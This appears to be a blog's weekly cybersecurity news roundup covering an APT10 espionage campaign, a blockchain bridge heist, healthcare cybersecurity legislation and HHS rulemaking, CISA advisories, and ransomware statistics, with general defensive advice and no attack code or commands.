A hacking and cyber espionage operation is going after victims around the world in a widespread campaign designed to snoop on targets and steal information. 

Identified victims of the cyber attacks include organisations in government, law, religious groups, non-governmental organisations (NGOs), the pharmaceutical sector and telecommunications. Multiple countries have been targeted, including the U.S., Canada, Hong Kong, Japan, Turkey, Israel, India, Montenegro, and Italy. 

Detailed by cybersecurity researchers at Symantec, the campaign is the work of a group they call Cicada – also known as APT10 – a state-sponsored offensive hacking group which western intelligence agencies have linked to the Chinese Ministry of State Security. In some cases, the attackers spent as long as nine months inside the networks of victims.  

APT10 has been active for over a decade, with the earliest evidence of this latest campaign appearing in mid-2021. The most recent activity which has been detailed took place in February 2022 and researchers warn that the campaign could still be ongoing. * * *

Defending against a well-resourced nation-state backed hacking group isn’t easy, but there are steps which network defenders can take to help avoid becoming the victim of an attack. These include patching known vulnerabilities – such as those in Microsoft Exchange which Cicada appear to have exploited – and hardening credentials via the use of multi-factor authentication.

Researchers also recommend the introduction of one-time credentials for administrative work to help prevent theft and misuse of admin logins, and that cybersecurity teams should continuously monitor the network for potentially suspicious activity. 

The Wall Street Journal reports on how hackers target bridges between blockchains to engage in massive cryptoheists. A recent heist reaped $540 million in cryptocurrency for the hackers.

Hackers moved the funds by exploiting the Ronin Network, software that allows users of the online game “Axie Infinity” to transfer digital assets across different blockchains. Growing sums of money exchanged over such bridges have turned them into targets.

The FEHBlog understood that decentralized blockchains were hack proof, but apparently not.

From the cyberdefense front, Security Week offers a commentary on using a resilient zero trust policy.

The FEHBlog was delighted earlier this week to read this Department of Health and Human Services announcement requesting public comment to help HHS craft a rule to implement the December 2021 HITECH Act amendment creating a limited safe harbor for HIPAA covered entities and business associates that use recognized security practices. HHS seeks public input on identifying these recognized security practices. The public comment deadline is June 6, 2022.

Individuals seeking more information about the RFI or how to provide written or electronic comments to OCR should visit the Federal Register to learn more: https://www.federalregister.gov/documents/2022/04/06/2022-07210/considerat

Cybersecurity Saturday

From Capitol Hill, Health IT Security reports

Senators Bill Cassidy (R-LA) and Jacky Rosen (D-NV) introduced the bipartisan Healthcare Cybersecurity Act (S. 3904), shortly after President Biden warned all critical infrastructure sectors to harden their cyber defenses to safeguard against potential Russian cyberattacks. * * *

The act aims to strengthen healthcare cybersecurity by partnering the Cybersecurity and Infrastructure Security Agency (CISA) with HHS. Specifically, the act would require CISA and HHS to enter into an agreement, as defined by CISA, that would improve cybersecurity in the healthcare and public health sector.

If passed, CISA will work with information sharing organizations and analysis centers to create resources specific to the healthcare sector and to promote threat sharing. The act also supports training efforts for private sector healthcare experts. CISA would be responsible for educating healthcare asset owners and operators on the cybersecurity risks within the sector and ways to manage those risks.

The act would also mandate that CISA conduct a thorough study on the cybersecurity risks facing the healthcare sector. The study would explore strategies for securing medical devices and electronic health records, and how data breaches impact patient care.

The Senate Homeland Security and Governmental Affairs Committee held a business meeting on March 30, at which the Committee favorably reported an amended version of S. 3904 (Item 18). This action suggests that the bill has legislative legs. The FEHBlog will keep an eye on it.

Nextgov identifies six cybersecurity takeaways from the President’s proposed FY 2023 budget that was delivered to Capitol Hill last Monday.

In cybersecurity news, CISA announced yesterday

the start of National Supply Chain Integrity Month. CISA, in partnership with the Office of the Director of National Intelligence (ODNI) and other government and industry partners, is promoting a call to action for a unified effort by organizations across the country to strengthen the information and communications technology (ICT) supply chain.

CISA’s themes for each week include:

  • Week 1: Power in Partnership – Fortify The Chain!
  • Week 2: No Shortages of Threats – Educate to Mitigate
  • Week 3: Question, Confirm, and Trust – Be Supplier Smart
  • Week 4: Plan for the Future – Anticipate Change

Resources include those developed by the ICT SCRM Task Force, a public-private partnership that embodies the Agency’s collective approach to enhancing supply chain resilience.

Check out our webpage weekly for resources, a social media toolkit, videos, and the latest news: CISA.gov/supply-chain-integrity-month

The HHS Cybersecurity Program informs us

The Cybersecurity and Infrastructure Security Agency (CISA) and the Department of Energy are aware of threat actors gaining access to a variety of internet-connected uninterruptible power supply (UPS) devices, often through unchanged default usernames and passwords. In recent years, UPS vendors have added an Internet of Things (IoT) capability, and UPSs are routinely attached to networks for power monitoring, routine maintenance, and/or convenience.

CISA Insight – Mitigating Attacks Against Uninterruptible Power Supply Devices

Health IT Security reports

H-ISAC and Booz Allen Hamilton released a report and survey outlining the top cyber threats concerning healthcare executives in today’s sophisticated cyber threat landscape.

H-ISAC surveyed cybersecurity, IT, and non-IT executives and found no significant differences between the disciplines when the experts were asked to rank the top five greatest cybersecurity concerns facing their organizations in 2021 and 2022.

Ransomware deployment was the top-rated concern, followed by phishing and spear-phishing, third-party breaches, data breaches, and insider threats.

Medical Economics tells us, “The Confidentiality Coalition and the Workgroup for Electronic Data Interchange sent a letter to the Commerce and HHS Secretaries outlining their concerns with allowing unregulated third-party apps to get access to patient health information.”

From the ransomware front —

Cybersecurity Dive alerts us

The average ransomware payment to cybercriminals surged 78% last year to $541,010, fueled in part by the rapid spread of ransomware as a service (RaaS) business models that reduce barriers to entry for cyber extortionists, Palo Alto Networks said.

Ransomware attacks “show no signs of slowing down,” according to Ryan Olson, vice president of threat intelligence at Palo Alto Networks. “The long-term effects of these ransomware attacks can be devastating, going beyond the actual cost of the ransom to include a number of ancillary costs associated with downtime, remediation and disruptions to business,” the company said in a report.

Ransomware criminals last year targeted companies in the Americas in 60% of their attacks and demanded on average $2.2 million from their victims, a 144% increase compared with 2020, Palo Alto Networks said.

GCN reports

Ransomware encrypts faster than organizations can respond, making it unlikely that they can prevent a total loss of data from an attack, according to a new study.

The research by SURGe, Splunk’s new cybersecurity research arm, found that the median ransomware variant can encrypt 98,561 files totaling almost 54 gigabytes in 42 minutes and 52 seconds.

“Forty-three minutes is an extremely limited window of opportunity for mitigation, especially considering that the average time to detect compromise is three days, as the Mandiant M-Trends report found,” according to “An Empirically Comparative Analysis of Ransomware Binaries,” which Splunk published March 23.

As usual, here is a link to Bleeping Computer’s The Week in Ransomware.

From the cyberdefense front, CIS identifies best practices for regulatory compliance.

Speaking of regulatory compliance, HHS’s Office for Civil Rights announced four HIPAA Privacy Rule enforcement actions last week.